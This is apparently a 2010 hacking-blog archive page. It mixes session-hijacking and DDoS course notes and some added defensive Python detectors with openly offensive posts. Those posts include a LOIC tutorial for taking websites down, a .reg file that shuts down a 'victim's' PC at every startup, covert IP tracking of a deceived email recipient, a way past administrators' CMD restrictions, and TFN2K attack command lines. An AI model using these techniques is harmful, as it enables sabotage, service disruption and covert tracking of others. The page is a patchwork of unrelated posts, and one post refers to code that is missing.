Home » Archives for March 2010
Protecting against Session Hijacking
- Use encryption
- Use a secure protocol
- Limit incoming connections
- Minimize remote access
- Have strong authentication
Countermeasure | When practical, limit successful sessions to specific IP addresses. This usually only works when dealing within an intranet setting, where the IP ranges are predictable and finite. |
Countermeasure | Re-authenticate the user before critical actions are performed. If possible, try to limit unique session tokens to each browser instance (e.g. generate the token with a hash of the MAC address of the computer and process id of the browser, etc.) Configure the appropriate spoof rules on gateways (internal and external). Monitor for ARP cache poisoning, by using IDS products or ARPwatch. |
Countermeasure | Use x.509 certificates to prevent more traditional types of TCP hijacking. |
Countermeasure | Use encryption. This can be done by one or more of the following.
|
Countermeasure | Use strong authentication (like Kerberos) or peer-to-peer VPNs. |
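The ARP cache poisoning monitoring recommended above comes down to tracking which MAC address claims each IP address and alerting when that binding changes. The following is an added example, not code from the original page or from ARPwatch itself; the observation records, the documentation-range addresses and the 300-second flip window are constructed assumptions.

```python
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class ArpSeen:
    ts: float   # capture time in seconds
    ip: str     # sender protocol address from the ARP packet
    mac: str    # sender hardware address from the ARP packet


def normalize_mac(mac: str) -> str:
    """Lower-case and use ':' so the same address always compares equal."""
    return mac.strip().lower().replace("-", ":")


def analyze(observations, flip_window=300.0):
    """Return alerts for IP addresses whose MAC binding changes.

    changed-mac: the IP is now claimed by a different MAC than before.
    flip-flop:   the IP went back to the MAC it had before the last change,
                 within flip_window seconds (two stations claim the same IP).
    """
    current = {}                    # ip -> (mac, time the binding was set)
    previous = {}                   # ip -> mac held before the last change
    ips_by_mac = defaultdict(set)   # mac -> every IP it has claimed so far
    alerts = []

    for ob in sorted(observations, key=lambda o: o.ts):
        mac = normalize_mac(ob.mac)
        ips_by_mac[mac].add(ob.ip)
        if ob.ip not in current:
            current[ob.ip] = (mac, ob.ts)   # first sighting: learn it
            continue
        old_mac, set_at = current[ob.ip]
        if mac == old_mac:
            continue                        # binding unchanged
        recent = ob.ts - set_at <= flip_window
        is_flip = previous.get(ob.ip) == mac and recent
        alerts.append({
            "ts": ob.ts,
            "kind": "flip-flop" if is_flip else "changed-mac",
            "ip": ob.ip,
            "old_mac": old_mac,
            "new_mac": mac,
            # Other IPs the new MAC already answers for: a workstation that
            # suddenly also answers for the gateway deserves a close look.
            "also_owns": sorted(ips_by_mac[mac] - {ob.ip}),
        })
        previous[ob.ip] = old_mac
        current[ob.ip] = (mac, ob.ts)
    return alerts


# Constructed sample: 192.0.2.1 is the gateway. At t=100 the workstation at
# 192.0.2.30 starts answering for the gateway address as well.
SAMPLE = [
    ArpSeen(0.0, "192.0.2.1", "00:00:5e:00:53:01"),
    ArpSeen(1.0, "192.0.2.20", "00:00:5e:00:53:20"),
    ArpSeen(2.0, "192.0.2.30", "00:00:5e:00:53:30"),
    ArpSeen(100.0, "192.0.2.1", "00-00-5E-00-53-30"),
    ArpSeen(101.0, "192.0.2.1", "00:00:5e:00:53:01"),
    ArpSeen(102.0, "192.0.2.1", "00:00:5e:00:53:30"),
]

if __name__ == "__main__":
    for alert in analyze(SAMPLE):
        print(alert)
```

A changed binding is not always hostile (DHCP reassignment or a replaced network card produces the same event), so the `also_owns` field and repeated flip-flops are what separate routine churn from poisoning.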

Remote TCP Session Reset Utility
- Start up the remote TCP session reset
- Enter the IP address of the machine whose connection is to be reset.
- Enter the read-write community string.
- Click on connect to retrieve a list of active TCP connections
- Click on the connection that is to be disconnected, and select 'Break' from the toolbar.

Programs that perform Session Hijacking
There are several programs available that perform session hijacking. The following are a few that belong to this category:

- Juggernaut
- Hunt
- TTY Watcher
- IP Watcher
- T-Sight

Juggernaut

- Juggernaut is a network sniffer that can be used to hijack TCP sessions. It runs on Linux operating systems.
- Juggernaut can be set to watch for all network traffic or it can be given a keyword like password to look out for.
- The main function of this program is to maintain information about various session connections that are occurring on the network.
- The attacker can see all the sessions and he can pick a session he wants to hijack.

Juggernaut is basically a network sniffer that can also be used to hijack TCP sessions. It runs on Linux and has a Trinux module as well. Juggernaut can be activated to watch all network traffic on the local network.

For example, Juggernaut can be configured to wait for the login prompt, and then record the network traffic that follows (usually capturing the password). By doing so, this tool can be used to capture certain types of traffic by simply leaving the tool running for a few days, and then the attacker just has to pick up the log file that contains the recorded traffic. This is different from regular network sniffers that record all network traffic, making the log files extremely large (and thus easy to detect).

However, the main feature of this program is its ability to maintain a connection database. This means an attacker can watch all the TCP-based connections made on the local network, and possibly "hijack" the session. After the connection is made, the attacker can watch the entire session (for a telnet session, this means the attacker sees the "playback" of the entire session. This is like actually seeing the telnet window).

When an active session is watched, the attacker can perform some actions on that connection, besides passively watching it. Juggernaut is capable of resetting the connection (which basically means terminating it), and also hijacking the connection, allowing the attacker to insert commands in the session or even to completely take the session into his hands (resetting connection on the legitimate client).

Sequence Numbers - crucial to hijacking a session
- Sequence numbers are very important to provide reliable communication but they are also crucial to hijacking a session.
- The sequence number is a 32-bit counter, which means the value can be any of over 4 billion possible combinations.
- The sequence numbers are used to tell the receiving machine what order the packets should go in when they are received.
- Therefore an attacker must successfully guess the sequence number to hijack a session.

Threat | If a sequence number within the receive window is known, an attacker can inject data into the session stream or choose to terminate the connection. If the attacker knows the initial sequence number, he can send a simple packet to inject data or kill the session if he is aware of the number of bytes transmitted in the session thus far. |
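The receive-window test that the threat statement depends on is shown below as an added example, not code from the original page. It implements the 32-bit wraparound comparison a receiver applies to an incoming sequence number, together with the stricter RST handling specified in RFC 5961 (a mitigation the page does not mention); the function names are assumptions made for this illustration.

```python
MOD = 1 << 32  # sequence numbers are 32-bit counters and wrap around


def next_seq(isn: int, bytes_sent: int) -> int:
    """Sequence number a receiver expects next: the SYN consumes one number,
    then each payload byte consumes one more."""
    return (isn + 1 + bytes_sent) % MOD


def seq_offset(seq: int, rcv_nxt: int) -> int:
    """Distance from the next expected number to seq, modulo 2**32."""
    return (seq - rcv_nxt) % MOD


def in_window(seq: int, rcv_nxt: int, rcv_wnd: int) -> bool:
    """Classic acceptability test: rcv_nxt <= seq < rcv_nxt + rcv_wnd,
    evaluated with wraparound so it still works near 0xFFFFFFFF."""
    return seq_offset(seq, rcv_nxt) < rcv_wnd


def rst_disposition(seq: int, rcv_nxt: int, rcv_wnd: int) -> str:
    """RFC 5961 handling of a segment with the RST flag set.

    Only an exact match on the next expected number resets the connection.
    A value that is merely inside the window triggers a challenge ACK, and
    anything else is dropped silently.
    """
    if seq % MOD == rcv_nxt % MOD:
        return "reset"
    if in_window(seq, rcv_nxt, rcv_wnd):
        return "challenge-ack"
    return "drop"


def guesses_to_cover(rcv_wnd: int) -> int:
    """How many evenly spaced values are needed so that one of them falls
    inside a window of rcv_wnd bytes. This is the exposure of a receiver
    that accepts any in-window value instead of an exact match."""
    if rcv_wnd <= 0:
        raise ValueError("receive window must be positive")
    return -(-MOD // rcv_wnd)  # ceiling division


if __name__ == "__main__":
    rcv_nxt = next_seq(0xFFFFFFE0, 15)  # constructed ISN close to wraparound
    for candidate in (rcv_nxt, 5, 0x1000):
        print(hex(candidate), rst_disposition(candidate, rcv_nxt, 64))
    print(guesses_to_cover(16384))
```

The arithmetic shows why "over 4 billion combinations" overstates the protection: with a 16384-byte window the space that matters shrinks by a factor of 16384, which is the gap the exact-match rule for RST closes.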

Hack a website with denial of service attack
Now I will show you how to hack a website with Denial of service attack. For this tutorial we will be using one of the most effective and one of the least known tools called "Low Orbit Ion Cannon", created by Anonymous members from 4chan.org, this program is one of the best for DDoS'ing, and I have successfully used it to DDoS websites. An internet connection as bad as mine (2,500 kb/s) was able to keep a site down for a day with this program running. Remember that this tool will work best with high internet speeds, and try not to go for impossible targets (like Google, Myspace, Yahoo). LOIC is used on a single computer, but with friends it's enough to give sites a great deal of downtime.
Prerequisites: Download LOIC (Low Orbit Ion Cannon). Open up LOIC.
Step 1: Type the target URL in the URL box.
Step 2: Click lock on.
Step 3: Change the threads to 9001 for maximum efficiency.
Step 4: Click the big button " IMMA FIRIN MAH LAZAR!"
Feel free to tweak around with these settings and play around with the program to get the best performance. Then minimize and go do whatever you need to do, the program will take care of the rest!

HOW TO MODIFY *.EXE FILES
Learn how to change *.exe files in 5 easy steps:
1) Don't try to modify a program by editing its source in a disassembler. Why? Because that's for programmers and assembly experts only. If you try to view it in hex you'll only get tons of crap you don't understand. First off, you need Resource Hacker (latest version). It's a resource editor that is very easy to use. You can download it at http://www.users.on.net/johnson/resourcehacker/
2) Unzip the archive, and run ResHacker.exe. You can check out the help file too.
3) You will see that the interface is simple and clean. Go to the menu File > Open or press Ctrl+O to open a file. Browse your way to the file you would like to edit. You can edit *.exe, *.dll, *.ocx, *.scr and *.cpl files, but this tutorial is to teach you how to edit *.exe files, so open one.
4) In the left side of the screen a list of sections will appear.
The most common sections are
-String table;
-RCData;
-Dialog;
-Cursor group;
-Bitmap;
-WAV.
*Icon: You can view and change the icon(s) of the program by double-clicking the icon section, choosing the icon, right-clicking on it and pressing "replace resource". After that you can choose the icon you want to replace the original with.
*String table: a bunch of crap, useful sometimes, basic programming knowledge needed.
*RCData: Here the real hacking begins. Modify window titles, buttons, text, and lots more!
*Dialog: Here you can modify the messages or dialogs that appear in a program. Don't forget to press "Compile" when you're done!
*Cursor group: Change the mouse cursors used in the program just like you would change the icon.
*Bitmap: View or change images in the program easily!
*WAV: Change the sounds in the program with your own.
5) In the RCData, Dialog, Menu and String table sections you can make a lot of changes. You can modify or translate the text, change links, change buttons, etc.
TIP: To change a window title, search for something like: CAPTION "edit this".
TIP: After all operations press the "Compile Script" button, and when you're done editing, save your work with File > Save (Save as).
TIP: When you save a file, the original file will be backed up by default and renamed to Name_original and the saved file will have the normal name of the changed program.
TIP: Sometimes you may get a message like: "This program has a non-standard resource layout... it has probably been compressed with an .EXE compressor." That means that Resource Hacker can't modify it because of its structure.

Yahoo Messenger multiple logins
Yahoo Messenger trick-How to open Multiple Yahoo Messenger???
1. Go to start > Run > Type regedit > Press Enter
2. Click on the plus sign near the folder HKEY_CURRENT_USER
3. Click on the plus sign near the folder Software
4. Click on the plus sign near the folder Yahoo
5. Click on the plus sign near the folder Pager
6. Right Click on the folder name Test > New > DWORD Value
7. Right side you will get a file named New Value #1
8. Right Click on the file New Value #1 and Rename it as Plural and press enter
9. Double Click on the file Plural
10. You will get a window named Edit DWORD Value
11. Type 1 inside 'Select the Value data' and press enter
12. Close the registry editor window
13. Now you can launch multiple windows and use different ID's

Shut down your friend's computer every time it starts:
That's really easy.
Put the following text in a .reg file and run it on the victim's PC:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"VIRUS"="%windir%\\SYSTEM32\\SHUTDOWN.EXE -t 1 -c \"Howz this new Virus ah\" -f"
DONT PUT IT IN UR COMPUTER, I AM NOT RESPONSIBLE. If it happens to you, start Windows in safe mode, and open the registry editor by typing REGEDIT in start->run. Navigate to [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] and remove the string value named VIRUS, then restart your computer.
You can also put this in a javascript code, just add this code to your webpage:
Be careful, a drawback of the js code is that NORTON ANTIVIRUS's script blocking feature may block this.
Well, I am also trying to find the method which executes without any drawbacks. So if u have one, pls post it here.
ENJOY !!!

Types of session Hijacking
- Active: In an active attack, an attacker finds an active session and takes over.
- Passive: With a passive attack, an attacker hijacks a session, but sits back and watches and records all of the traffic that is being sent forth.

Session hijacking can be active or passive in nature depending on the degree of involvement of the attacker in the attack. The essential difference between an active and passive hijack is that while an active hijack takes over an existing session, a passive attack monitors an ongoing session.

Steps in Session Hijacking
- Tracking the session
- Desynchronizing the connection
- Injecting the attacker's packet

How does an attacker go about hijacking a session? The hijack can be broken down into four broad phases.
- Tracking the connection: The attacker will wait to find a suitable target and host. He uses a network sniffer to track the victim and host, or identifies a suitable user by scanning with a scanning tool such as nmap to find a target with a trivial TCP sequence prediction. This is done to ensure that the correct sequence and acknowledgement numbers are captured, as packets are checked by TCP through sequence and/or acknowledgement numbers. These will later be used by the attacker in crafting his own packets.

- Desynchronizing the connection: A desynchronized state is when a connection between the target and host is in the established state; or in a stable state with no data transmission; or the server's sequence number is not equal to the client's acknowledgement number; or the client's sequence number is not equal to the server's acknowledgement number. To desynchronize the connection between the target and host, the sequence number or the acknowledgement number (SEQ/ACK) of the server must be changed. This can be done if null data is sent to the server so that the server's SEQ/ACK numbers will advance, while the target machine will not register such an increment.

  The desynchronizing is preceded by the attacker monitoring the session without interference till an opportune moment, when he will send a large amount of "null data" to the server. This data serves only to change the ACK number on the server and does not affect anything else. The attacker does likewise to the target also. Now both the server and target are desynchronized.

- Resetting the connection: Another approach is to send a reset flag to the server and tear down the connection on the server side. This is ideally done in the early setup stage. The goal of the attacker is to break the connection on the server side and create a new one with a different sequence number.

  The attacker listens for a SYN/ACK packet from the server to the host. On detecting the packet, he sends an RST to the server and a SYN packet with exactly the same parameters, such as port number, but a different sequence number. The server, on receiving the RST packet, closes the connection with the target, but initiates another one based on the SYN packet, with a different sequence number on the same port. Having opened a new connection, the server sends a SYN/ACK packet to the target for acknowledgement. The attacker detects (but does not intercept) this and sends back an ACK packet to the server. Now, the server is in the established state. The target is oblivious to the conversation and has already switched to the established state when it received the first SYN/ACK packet from the server. Now both server and target are in a desynchronized but established state.

  This can also be done using a FIN flag, but this will cause the server to respond with an ACK and give away the attack through an ACK storm. This results from a flaw in this method of hijacking a TCP connection. When receiving an unacceptable packet, the host acknowledges it by sending the expected sequence number and using its own sequence number. This packet is itself unacceptable and will generate an acknowledgement packet, which in turn will generate an acknowledgement packet, thereby creating a supposedly endless loop for every data packet sent. The mismatch in SEQ/ACK numbers results in excess network traffic with both the server and target trying to verify the right sequence. Since these packets do not carry data, they are not retransmitted if the packet is lost. However, since TCP uses IP, the loss of a single packet puts an end to the unwanted conversation between the server and target on the network.

  The desynchronizing stage is added in the hijack sequence so that the target host is kept in the dark about the attack. Without desynchronizing, the attacker will still be able to inject data to the server and even keep his identity by spoofing an IP address. However, he will have to put up with the server's response being relayed to the target host as well.

- Injecting the attacker's packet: Now that the attacker has interrupted the connection between the server and target, he can choose to either inject data into the network or actively participate as the "man in the middle", and pass data from the target to the server, and vice versa, reading and injecting data as he sees fit.
- Alice opens a telnet session to Bob and starts doing some work.
- Eve observes the connection between Alice and Bob using a sniffer that is integrated into her hijacking tool. Eve makes a note of Alice's IP address and her hijacking software samples the TCP sequence numbers of the connection between Alice and Bob.
- Eve launches a DoS attack against Alice to stop Alice doing further work on Bob and to prevent an ACK storm from interfering with her attack.
- Eve generates spoofed packets with the correct TCP sequence numbers and connects to Bob.
- Bob thinks that he is still connected to Alice.
- Alice notices a lack of response from Bob and blames it on the network.
- Eve finds herself at a root prompt on Bob. She issues some commands to make a backdoor and uses the sniffer to observe the responses from Bob.
- After covering her tracks, Eve logs out of Bob and ceases the DoS attack against Alice.
- Alice notices that her connection to Bob has been dropped.
- Eve uses her backdoor to get directly into Bob.
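The ACK storm described above is also the most visible trace a desynchronized session leaves on the wire, so it makes a practical detection signal. The following is an added example, not code from the original page: it scans constructed segment records for a burst of zero-length ACKs bouncing in both directions with the same few SEQ/ACK values. The record layout and the thresholds are assumptions chosen for the illustration.

```python
from collections import defaultdict, deque, namedtuple

# One captured TCP segment. flags is a compact string such as "A" or "PA".
Seg = namedtuple("Seg", "ts src sport dst dport flags seq ack length")


def conn_key(s):
    """Direction-independent identifier for a TCP connection."""
    a, b = (s.src, s.sport), (s.dst, s.dport)
    return (a, b) if a <= b else (b, a)


def find_ack_storms(segments, window=1.0, min_acks=20, max_distinct=4):
    """Flag connections where both ends exchange empty ACKs in a tight loop.

    A storm is reported when, inside `window` seconds, a connection carries
    at least `min_acks` pure ACK segments with no payload, sent by both
    endpoints, that repeat at most `max_distinct` (sender, seq, ack) values.
    A healthy bulk transfer also produces many empty ACKs, but from one side
    only and with steadily advancing acknowledgement numbers.
    """
    recent = defaultdict(deque)   # conn -> empty ACKs inside the time window
    storms = {}
    for s in sorted(segments, key=lambda seg: seg.ts):
        if s.flags != "A" or s.length != 0:
            continue
        key = conn_key(s)
        q = recent[key]
        q.append(s)
        while s.ts - q[0].ts > window:
            q.popleft()
        if len(q) < min_acks or key in storms:
            continue
        senders = {(x.src, x.sport) for x in q}
        distinct = {(x.src, x.seq, x.ack) for x in q}
        if len(senders) == 2 and len(distinct) <= max_distinct:
            storms[key] = {"first_seen": q[0].ts, "empty_acks": len(q)}
    return storms


def constructed_capture():
    """Constructed sample: one desynchronized telnet session and one
    ordinary download running at the same time."""
    segs = []
    for i in range(40):
        t = 10.0 + i * 0.01
        if i % 2 == 0:   # client keeps repeating its own view of the stream
            segs.append(Seg(t, "192.0.2.10", 40000, "192.0.2.23", 23,
                            "A", 1000, 5000, 0))
        else:            # server answers with the numbers it expects
            segs.append(Seg(t, "192.0.2.23", 23, "192.0.2.10", 40000,
                            "A", 5300, 1200, 0))
    for i in range(40):  # download: data one way, advancing ACKs the other
        t = 10.0 + i * 0.01
        segs.append(Seg(t, "198.51.100.5", 80, "192.0.2.11", 41000,
                        "PA", 9000 + i * 1000, 700, 1000))
        segs.append(Seg(t + 0.005, "192.0.2.11", 41000, "198.51.100.5", 80,
                        "A", 700, 9000 + (i + 1) * 1000, 0))
    return segs


if __name__ == "__main__":
    for conn, info in find_ack_storms(constructed_capture()).items():
        print(conn, info)
```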

Spoofing Vs Hijacking
The early record of a session hijacking is perhaps the Morris Worm episode that affected nearly 6000 computers on the ARPANET in 1988. This was ARPANET's first automated network security incident. Robert T. Morris wrote a program that would connect to another computer, find and use one of several vulnerabilities to copy itself to that second computer, and begin to run the copy of itself at the new location. Both the original code and the copy would then repeat these actions in an infinite loop to other computers on the ARPANET.
Blind IP spoofing involves predicting the sequence numbers that the victimized host will send in order to create a connection which appears to originate from the host. Before exploring blind spoofing further, let us take a look at sequence number prediction.
When an attacker uses captured, reverse engineered or brute forced authentication tokens to take over the control of a legitimate user's session while he is in session, the session is said to be hijacked. Due to this attack, the legitimate user may lose access or be deprived of the normal functionality of the session to the attacker, who now acts with the user's privileges.
Session hijacking is even more difficult than IP address spoofing. In session hijacking, John would seek to insert himself into a session that Jane already had set up with \\Mail. John would wait until Jane established a session, then knock her off the air by some means and pick up the session as though he was her. As before, John would send a scripted set of packets to \\Mail but would not be able to see the responses. To do this, he would need to know the sequence number in use when he hijacked the session, which could be calculated knowing the ISN and the number of packets that have been exchanged.

Understanding session hijacking

Enumerate User Information

Social Engineering Techniques: Dumpster Diving

Common Types of Social Engineering
- Human-based Social Engineering refers to person to person interaction to retrieve the desired information.
- Computer-based Social Engineering refers to having computer software that attempts to retrieve the desired information.
Reciprocation | Someone is given a "token" and feels compelled to take action. | You buy the wheel of cheese when given a free sample. |
Consistency | Certain behavior patterns are consistent from person to person. | If you ask a question and wait, people will be compelled to fill the pause. |
Social Validation | Someone is compelled to do what everyone else is doing. | Stop in the middle of a busy street and look up; people will eventually stop and do the same. |
Liking | People tend to say yes to those they like, and also to attractive people. | Attractive models are used in advertising. |
Authority | People tend to listen and heed the advice of those in a position of authority. | "Four out of five doctors recommend...." |
Scarcity | If something is in low supply, it becomes more "precious" and, therefore, more appealing. | Furbies or Sony Playstation 2. |
Source: Gartner Research |

Know Someone’s IP & Location via Email
Getting someone’s IP Address or location was never so easy!
There’s a site which allows you to know the IP, Location, etc… of a person just by sending an email. The site is www.SpyPig.com , which is actually meant for tracking emails but it can be used for getting such info also :P
For doing all this, you just need to attach an image provided by SpyPig. If you want, you can also use your images by making an ID @ SpyPig.com .
To make the SpyPig image work, the victim must enable images in emails (which is usually disabled by default!). To make my victim do this, I made an ID at SpyPig.com and added some wallpapers, and used them as SpyPig images and requested my victim to Enable images to view the wallpapers…

USB flash drive portable browsers
Have you ever been some place other than your home on your computer? If your answer is anything other than yes, you need to stop being a computer hugging hippy and go outside, get a whiff of some fresh air, step on some dog crap and accidentally run over a cat. It’ll do you some good. Anyways, have you visited someone somewhere and while using his/her/its computer, you realized you didn’t know a password because it was saved on your browser, or you wanted to show your friend that one cool website with the non-Asian ninjas, but it was in your bookmarks, or you wanted to use an extension you had installed on your browser that got rid of homosexual ads? Well you can. It’s called portable browsers, a.k.a a browser on your USB drive.
If you use Mozilla Firefox, which I highly recommend, you can download the portable browser hiya: I’m a link.
If you’re an apple fanboy or just like safari, you can download its portable version hiya: I’m a link too.
If you use Internet Explorer, you must have some sort of brain blockage and need to fall off a cliff.
Some great features of these portable browsers are:
- you can take your bookmarks with you
- although probably not a good idea, for those of you that happen to always kill the brain cells holding your passwords, you can take the saved ones with you
- take all your extensions with you
- keeps your information stored on the flash drive instead of the computer you are using

How to get command prompt
In many public places like schools and libraries, the system administrators disable CMD.EXE but forget about the older version, COMMAND.COM. When trying to access CMD.EXE, if you are shown the following message:
then you know it is disabled for your user level.
To get a COMMAND.COM prompt up, open Notepad.exe and type in “command.com” without the quotes. Next, save it as a batch file via the “.bat” extension. So save it as “anything.bat” . Now once you double click this file, you should get a functional command prompt if it isn’t disabled.

Social Engineering: Art of Manipulation
- What is Social Engineering?
- Common Types of Attacks
- Social Engineering by Phone
- Dumpster Diving
- Online Social Engineering
- Reverse Social Engineering
- Policies and Procedures
- Employee Education

- Social Engineering is the use of influence and persuasion to deceive people for the purpose of obtaining information or persuading the victim to perform some action.
- Companies with authentication processes, firewalls, virtual private networks and network monitoring software are still wide open to attacks.
- An employee may unwittingly give away key information in an email or by answering questions over the phone with someone they don't know or even by talking about a project with co-workers at a local pub after hours.

- Social Engineering includes acquisition of sensitive information or inappropriate access privileges by an outsider, based upon building of inappropriate trust relationships with outsiders.
- The goal of a social engineer is to trick someone into providing valuable information or access to that information.
- It preys on qualities of human nature, such as the desire to be helpful, the tendency to trust people and the fear of getting in trouble.

- Social engineering is hacker jargon for getting needed information from a person rather than breaking into a system.
- Psychological subversion is the term for using social engineering over an extended period of time to maintain a continuing stream of information and help from unsuspecting users.

- People are usually the weakest link in the security chain.
- A successful defense depends on having good policies in place and educating employees to follow the policies.
- Social Engineering is the hardest form of attack to defend against because it cannot be defended with hardware or software alone.

Social engineering concentrates on the weakest link of the computer security chain. It is often said that the only secure computer is an unplugged one. The fact that you could persuade someone to plug it in and switch it on means that even powered down computers are vulnerable.

Denial of Service attacks : Summary
- Denial of Service is a very commonly used attack methodology.
- Distributed Denial Of Service using a multiplicity of Zombie machines is an often seen attack methodology.
- There are various tools available for attackers to perpetrate DOS attacks.
- Protection against DOS is difficult due to the very nature of the attacks.
- Different scanning tools are available to aid detection and plugging of vulnerabilities leading to DOS.

Use Scanning Tools : Denial of Service attacks
- Find_ddos
- SARA
- DDoSPing v2.0
- RID
- Zombie Zapper

Find_DDoS: The tool find_ddos is intended to scan a local system that is either known or suspected to contain a DDOS program. It is capable of scanning executing processes on Solaris 2.6 or later, and of scanning local files on a Solaris 2.x (or later) system.

- mstream master
- mstream server
- stacheldraht client
- stacheldraht daemon
- stacheldraht master
- tfn-rush client
- tfn client
- tfn daemon
- tfn2k client
- tfn2k daemon
- trinoo daemon
- trinoo master
./find_ddos [-g grabdir] [-1 logfile] [-p] [-v] [-V] [-x exclude1] [scandir]
RID: RID (remote intrusion detector) is a tool programmed in C that is a highly configurable packet snooper and generator. It works by sending out packets defined in the config.txt file, then listening for appropriate replies.

- The Trinoo distributed denial of service attack client.
- The Tribal flood network distributed denial of service attack client.
- The StachelDraht distributed denial of service attack client.

Example:
# Sample config file
start AgentStacheldraht
send icmp type=0 id=668 data=""
recv icmp type=0 id=669 data="sicken" nmatch=2
end AgentStacheldraht

Zombie Zapper: Zombie Zapper works against Trinoo, TFN, Stacheldraht, Troj_Trinoo (Windows port of Trinoo), and Shaft. Assuming that

Common IDS systems
Shareware:
- Snort
- Shadow
- Courtney

Commercial:
- ISS RealSecure
- Axent NetProwler
- Cisco Secure ID (Net Ranger)
- Network Flight Recorder
- Network Security Wizard's Dragon

Preventing the DDoS
Important things to do as a current or potential victim of packet flooding Denial of Service are given below:

Preventing DoS Attacks
- Effective robust design
- Bandwidth limitations
- Keep systems patched
- Run the least amount of services
- Allow only necessary traffic
- Block IP addresses

The DoS and DDoS attacks in combination with malicious code implantations are easily launched but difficult to completely stop. With the nature of TCP/IP and programming issues that are often overlooked, the current Internet is still vulnerable to various forms of DoS and DDoS attacks. There is no "silver bullet" solution to this, like many other security issues.

- Timely application of patches and system updates, especially to potentially exposed machines. For example, update and maintain a current build of BIND on DNS servers.
- Deployment of only strictly necessary network services
- Intrusion detection systems
- Firewalls
- Anti-virus software
- Good password policies
- Use of Tripwire or other similar tools to detect changes in configuration information or other important files
- Paying heed to "Top 20" vulnerability lists provided by the information security community and evaluating these risks against one's environment
- Establishment and maintenance of regular backup schedules and policies
- As a network is only as secure as its weakest link, protection of mobile and remote machines with personal firewall/intrusion detection software

Tribe Flood Network : Tools Trinoo, TFN2K & Stacheldraht
- Could be thought of as 'son of trinoo'
- Improved on some of the weaknesses of trinoo by adding different types of attacks that could be mounted against the victim site.
- Structured like trinoo with attackers, clients (masters) and daemons.
- Initial system compromise allows the TFN programs to be installed.

Tribe Flood Network, like trinoo, uses a master program to communicate with attack agents located across multiple networks. TFN launches coordinated Denial of Service Attacks that are especially difficult to counter as it can generate multiple types of attacks and it can generate packets with spoofed source IP addresses. Some of the attacks that can be launched by TFN include UDP flood, TCP SYN flood, ICMP echo request flood, and ICMP directed broadcast. The basic characteristics of and suggested defense strategies against the TFN DDoS attack follow.

- To initiate TFN, the attacker accesses the master program and sends it the IP address of one or more targets. The master program proceeds to communicate with all of the agent programs, instructing them to initiate the attack.
- Communications between TFN master programs and agent programs use ICMP echo reply packets, where the actual instruction to be carried out is embedded in the 16-bit ID field in binary format. The use of ICMP (Internet Control Message Protocol) makes packet protocol filtering possible.
- TFN agents can be defeated by configuring your router or intrusion detection system to disallow all ICMP echo and echo reply packets onto your network. However, this will break all internet programs (such as "ping") that utilize these functions.

- The TFN master program reads a list of IP addresses containing the locations of the agent programs. This list of addresses may be encrypted, using "Blowfish" encryption.
- If it is not encrypted, then the agents can be identified from the list.

- The TFN agent programs have been found on systems with the filename td and the master programs with the name tfn. They can be positively identified by running the UNIX strings command.
- TFN agents do not check where the ICMP echo reply packets come from. Therefore, it is possible to forge ICMP packets to flush out these processes.
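A narrower check than dropping all ICMP echo traffic is to match each echo reply against an outstanding echo request, since the control channel described above sends replies that nobody asked for. The following is an added example, not code from the original page or from any of the tools it names; the packet records, addresses and ID values are constructed for the illustration and are not real TFN command codes.

```python
from collections import defaultdict, namedtuple

# One observed ICMP message: type 8 is echo request, type 0 is echo reply.
Icmp = namedtuple("Icmp", "ts src dst type id seq")

ECHO_REPLY, ECHO_REQUEST = 0, 8


def unsolicited_echo_replies(packets, timeout=5.0):
    """Return echo replies that do not answer a recent echo request.

    A normal ping reply reverses the addresses of its request, carries the
    same identifier and sequence number, and arrives within a few seconds.
    A reply with no matching request is not part of a ping exchange.
    """
    pending = {}    # (requester, responder, id, seq) -> time request was seen
    findings = []
    for p in sorted(packets, key=lambda pkt: pkt.ts):
        if p.type == ECHO_REQUEST:
            pending[(p.src, p.dst, p.id, p.seq)] = p.ts
        elif p.type == ECHO_REPLY:
            asked_at = pending.pop((p.dst, p.src, p.id, p.seq), None)
            if asked_at is None or p.ts - asked_at > timeout:
                findings.append(p)
    return findings


def summarize(findings):
    """Group findings per (sender, receiver) with the identifier values seen,
    because the identifier field is where the page says commands travel."""
    groups = defaultdict(lambda: {"count": 0, "ids": set()})
    for p in findings:
        group = groups[(p.src, p.dst)]
        group["count"] += 1
        group["ids"].add(p.id)
    return {pair: {"count": g["count"], "ids": sorted(g["ids"])}
            for pair, g in groups.items()}


# Constructed sample: two ordinary pings from 192.0.2.50, plus three echo
# replies sent to 192.0.2.77 that answer no request at all.
SAMPLE = [
    Icmp(1.00, "192.0.2.50", "198.51.100.7", ECHO_REQUEST, 0x1234, 1),
    Icmp(1.02, "198.51.100.7", "192.0.2.50", ECHO_REPLY, 0x1234, 1),
    Icmp(2.00, "192.0.2.50", "198.51.100.7", ECHO_REQUEST, 0x1234, 2),
    Icmp(2.03, "198.51.100.7", "192.0.2.50", ECHO_REPLY, 0x1234, 2),
    Icmp(5.00, "203.0.113.9", "192.0.2.77", ECHO_REPLY, 101, 0),
    Icmp(5.50, "203.0.113.9", "192.0.2.77", ECHO_REPLY, 102, 0),
    Icmp(6.00, "203.0.113.9", "192.0.2.77", ECHO_REPLY, 101, 0),
]

if __name__ == "__main__":
    for pair, info in summarize(unsolicited_echo_replies(SAMPLE)).items():
        print(pair, info)
```

Because the source addresses of such packets can be forged, the receiving host in each finding is the one worth inspecting, not the apparent sender.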
- TFN2K is a DDOS program which runs in distributed mode. There are two parts to the program: client and server.
- The server (also known as zombies) runs on a machine in listening mode and waits for commands from the client.

Running the server: #td
Running the client: #tn -h 23.4.56.4 -c8 -i 56.3.4.5

The TFN2K distributed denial of service system consists of client/server architecture.
Attack Methods | The Attack: The TFN2K client can be used to send various commands to the master for execution, including commands to flood a target machine or set of target machines within a specified address range. The client can send commands using UDP, SYN, ICMP echo, and ICMP broadcast packets. These flood attacks cause the target machine to slow down because of the processing required to handle the incoming packets, leaving little or no network bandwidth. |

- Client to Handler: 16660 TCP
- Handler to and from agents: 65000 ICMP

Stacheldraht consists of three parts: the master server, client, and agent programs.
